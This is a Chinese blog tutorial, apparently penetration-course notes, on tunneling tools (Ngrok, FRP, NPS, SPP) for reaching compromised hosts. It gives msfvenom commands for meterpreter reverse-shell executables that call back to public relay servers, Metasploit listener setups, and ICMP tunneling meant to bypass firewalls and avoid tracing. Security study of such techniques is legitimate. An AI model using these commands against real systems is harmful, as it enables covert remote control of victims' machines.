【内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

已于 2024-07-03 10:06:06 修改
阅读量1.7k 收藏 6
点赞数 2
分类专栏: # 内网渗透 文章标签: 安全 服务器 网络 内网穿透
于 2023-03-23 09:58:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129714974
版权

文章目录

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构
Linux:Proxychains
Windows:Sockscap Proxifier
穿透项目:Ngrok Frp Spp Nps EW(停更)
优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm

在这里插入图片描述

内网穿透-Ngrok-入门-上线

需要实名人脸验证
收费 官网注册按照使用手册就可以实现内网穿透,认证需要手续费,提供免费隧道但是速度慢
https://www.ngrok.cc/
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理

提供Ngrok和Frp两种服务器,两种服务器都支持http、https、tcp转发,Ngrok不支持udp转发,但是Frp支持udp的。两个服务器在使用上没有太多差别。如果是调试支付回调或者微信开发的话,Ngrok会比Frp好更多,因为可以http请求重现

1、服务端配置:

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

2、客户端连接服务端:

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

在这里插入图片描述

3、客户端生成后门配置监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

注意这里生成木马是使用的是ngrok平台提供的域名,本地kali客户端使用隧道号与平台建立连接,靶机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到本地kali上,实现内网穿透。免费的隧道协议有三种,如果上不了线可以一一尝试。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

内网穿透-Frp-简易型-上线

推荐
https://github.com/fatedier/frp
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件frps.ini:

[common] bind_port = 7000

启动服务端:
./frps -c ./frps.ini

2.控制端-下载-解压-修改-启动

控制端修改配置文件frpc.ini:

[common] server_addr = 47.94.236.117 server_port = 7000
#frpc工作端口,必须和上面frps保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #转发给本机的5555 remote_port = 6000
#服务端用6000端口转发给本机

启动客户端:
./frpc -c ./frpc.ini

msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6000 -f exe -o frp.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

3.靶机运行frp.exe即可

注意kali lilnux 监听的LHOST地址为127.0.0.1:5555,靶机为win server 2008 跳板机为vps

frp内网穿透-上线本地kali

内网穿透-Nps-自定义-上线

推荐 相当于自己管理整个平台很方便
https://github.com/ehang-io/nps
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。

-服务端:

1、启动
./nps install
./nps
http://IP:8080/ admin/123
2、创建客户端,生成密匙
在这里插入图片描述
3、添加协议隧道,绑定指向
远程绑定5566,指向本地88在这里插入图片描述

-客户端:

1、连接服务端:

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 88
run

在这里插入图片描述

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp
支持的协议:tcp、udp、udp、icmp、http、kcp、quic
支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理
在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,
但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。
在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

在这里插入图片描述

2、客户端: 将本地5555端口流量转发至47.94.236.117 80端口上(TCP封装成ICMP)

spp -name “test” -type proxy_client -server 47.94.236.117 -fromaddr :5555 -toaddr :80 -proxyproto tcp -proto ricmp

在这里插入图片描述

3、CS
监听器1:http 47.94.236.117 80
监听器2:http 127.0.0.1 5555
生成后门:监听器2

使用隧道后,会话交互会很慢,很容易断开连接
在这里插入图片描述

内网安全——穿透上线Ngrok&Frp&Nps&Spp
m0_61506558的博客
01-30 3552
nps是- -款轻量级、 高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量发,可支持任何tcp、udp. 上层协议(访问内网网站、本地支付接口调试、ssk方问、远程桌面,内网dns解析等等) ,此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。GitHub - ehang-io/nps: 一款轻量级、高性能、功能强大的内网穿透代理服务器
红队内网攻防渗透:内网渗透之内网对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 756
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
第127天:内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW 项目
weixin_71529930的博客
08-01 658
这里我还是用到这个案例二的实验环境,上面那台centos7在之前的基础上加一条dnat转换,把所有端口都转换到win2019上在win2019上建立nps服务器,先安装然后启动kali通过访问centos7的8080端口转发到win2019的8080端口,进行访问页面账号密码为admin 123然后访问,创建隧道配置隧道客户机连接隧道sudo ./npc -server=服务器的ip:8024 -vkey=k7euih90m3eda55u这个key为下图这个值。
EW内网穿透详解!
最新发布
hanjinming110的博客
09-20 1047
总结了一下ew的使用,希望可以和师傅们一起交流沟通!
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1478
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
内网渗透—内网穿透工具&Ngrok&FRP&NPS&SPP
2301_76227305的博客
07-26 1383
这个实验我没有做成功,老是遇到一些奇奇怪怪的问题,烦死了。如若有师傅了解,还恳请指点一二,有偿答谢。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
EW隧道搭建
weixin_45007073的博客
05-04 2021
EW代理技术常见的网络场景简介socks代理和端口转发的区别socks代理和端口转发的异同点一级网络环境 常见的网络场景 服务器内网中,可以任意访问外部网络 服务器内网中,可以访问外部网络,但服务器安装了防火墙来拒绝敏感端口的连接 服务器内网中,对外只开放了部分端口(80端口),且服务器不能访问外部网络 例如如下为常见的内网渗透测试环境 简介 EarthWorm简称EW,是一套便携式的网络工具,具有SOCKS5服务架设和端口转发功能,可以在复杂的网络环境中实现网络穿透EW能够以正向、反向、多级
使用nps搭建内网穿透服务
qq_45430571的博客
06-21 7445
🚀 nps是一款开源的内网穿透工具,它可以帮助用户将内网中的服务通过代理服务器映射到公网上,从而实现公网访问内网服务的功能。nps支持TCP和UDP协议,可以转发任何上层协议,例如HTTP、HTTPS、SSH等等。 除了内网穿透功能之外,nps还支持内网HTTP代理、内网socks5代理、p2p等特性,以及带有强大的Web管理端,可以方便地管理和配置代理服务器nps具有轻量、高性能、易于部署和配置等特点,广泛应用于企业内网、个人网络和云服务等领域。例如,开发人员可以使用nps来调试内网接口......
EWFRPNPS内网穿透实验
热门推荐
razorx的博客
01-14 1万+
内网穿透实验一、EarthWorm1.建立通信2.配置隧道代理3.连接远程桌面二、FRP1.下载及配置两端的ini配置文件2.建立连接3.访问FRP服务端web管理页面4.转发内网机器的ssh服务5.连接远程桌面三、NPS1.下载服务端和客户端并解压2.服务端安装并启动3.新增客户端连接4.客户端主动连接5.创建tunnel隧道6.访问远程桌面四、总结五、参考文章 免责声明:本文章仅用于学习交流...
nps_win64_C&S_0.25.0.zip
01-03
《64位Windows环境下nps 0.25.0版本详解》 nps,全称为Network Performance Simulator,是一款强大的网络性能模拟工具,专用于测试和分析网络的传输速率、延迟以及丢包率等关键性能指标。在64位Windows操作系统上,...
内网穿透FRP&NPS&SPP&Ngrok
qq_74806534的博客
04-05 1547
注意:这里所有的但是靶机和kali主动连接服务器跳板机,所以靶机反向连接跳板机,kali正向连接跳板机,跳板机没办法转发给kali数据,只有kali去拿数据,因为在内网环境。开通后,主要是三种协议可以选择,我们选择tcp,更加稳定,隧道名称都行,远程端口选择可用端口,本地端口选择本地kali攻击机ip端口。全面的协议支持,兼容几乎所有常用的协议,如tcp、udp、http(s)、socks5、p2p、http代理...首先是在Ngrok官网创建账号,然后实名认证,再到开通隧道下,开通免费的服务器
内网安全第一百二十七天
B_l_a_nk的博客
07-20 491
1、内网隧道&穿透&加密&上线 2、项目-Ngrok&Frp&Nps&Spp
SSH隧道内网穿透
爱吃回锅肉的胖子
04-26 3240
SSH参数解释 -L port:host:hostPort 解释:将本地机器某个端口转发到远端指定机器的指定端口 原理:本地机器分配了一个socket监听port端口,一旦端口上有了连接,该连接就经过安全通道转发出去,同时远程主机和host的hostPort端口建立连接。可以在配置文件中指定端口的转发。只有root才能转发特权端口。 -R port:host:hostPort 解释:将远程主机的某个端口转发到本地端指定机器的指定端口。即反向隧道代理 原理:远程主机上分配了一个socket监听p
ngrokfrp
金溪的博客
10-16 6202
这两款软件都是内网传透工具,可以将本地计算机上运行的web服务器公开到互联网上,个人比较倾向于frp,因为更个性化一些。
内网基础-隧道技术、内网穿透(SSH隧道、Socket隧道、跨路由扫描)
dzqxwzoe的博客
05-20 1613
​环境搭建​​​SSH隧道​​​正向连接​​​反向隧道​​​sockets代理​​​MSF端口映射​​​Socket隧道​​​ssocks​​​反向代理​​​1.建立隧道​​​2.开启代理​​​正向代理​​​扫描内网​​​MSF跨路由扫描​​​简单收集信息​​​增加路由​​​MSF其他模块​​​推荐阅读​​。
基于SSH隧道的简单内网穿透
Vega870092839的博客
01-26 2585
通过SSH隧道实现简单的内网穿透
EW 隧道
战神/calmness的博客
11-14 340
描述 环境 Windows 10 内网地址:192.168.1.14 kali 公网地址:192.168.28.130 过程 正向转发 ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.1.14 -g 3389 反向端口转发 一个不成功的例子: kali机器上【攻击机】监听: Windows机器上执行 结果失败 一个成功的例子: 后面再写 ...
内网渗透系列:内网穿透隧道)学习
闵行小鱼塘
06-30 9486
本文试图学习整理内网穿透技术
利用NPS快速搭建内网穿透服务教程
本文档主要介绍了如何在服务器上使用Docker搭建内网穿透服务,具体采用了NPS作为代理服务器NPS是一个功能强大且轻量级的内网穿透工具,支持TCP和UDP流量转发,具备内网HTTP/HTTPS代理、WebSocket代理、HTTP/2压缩...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值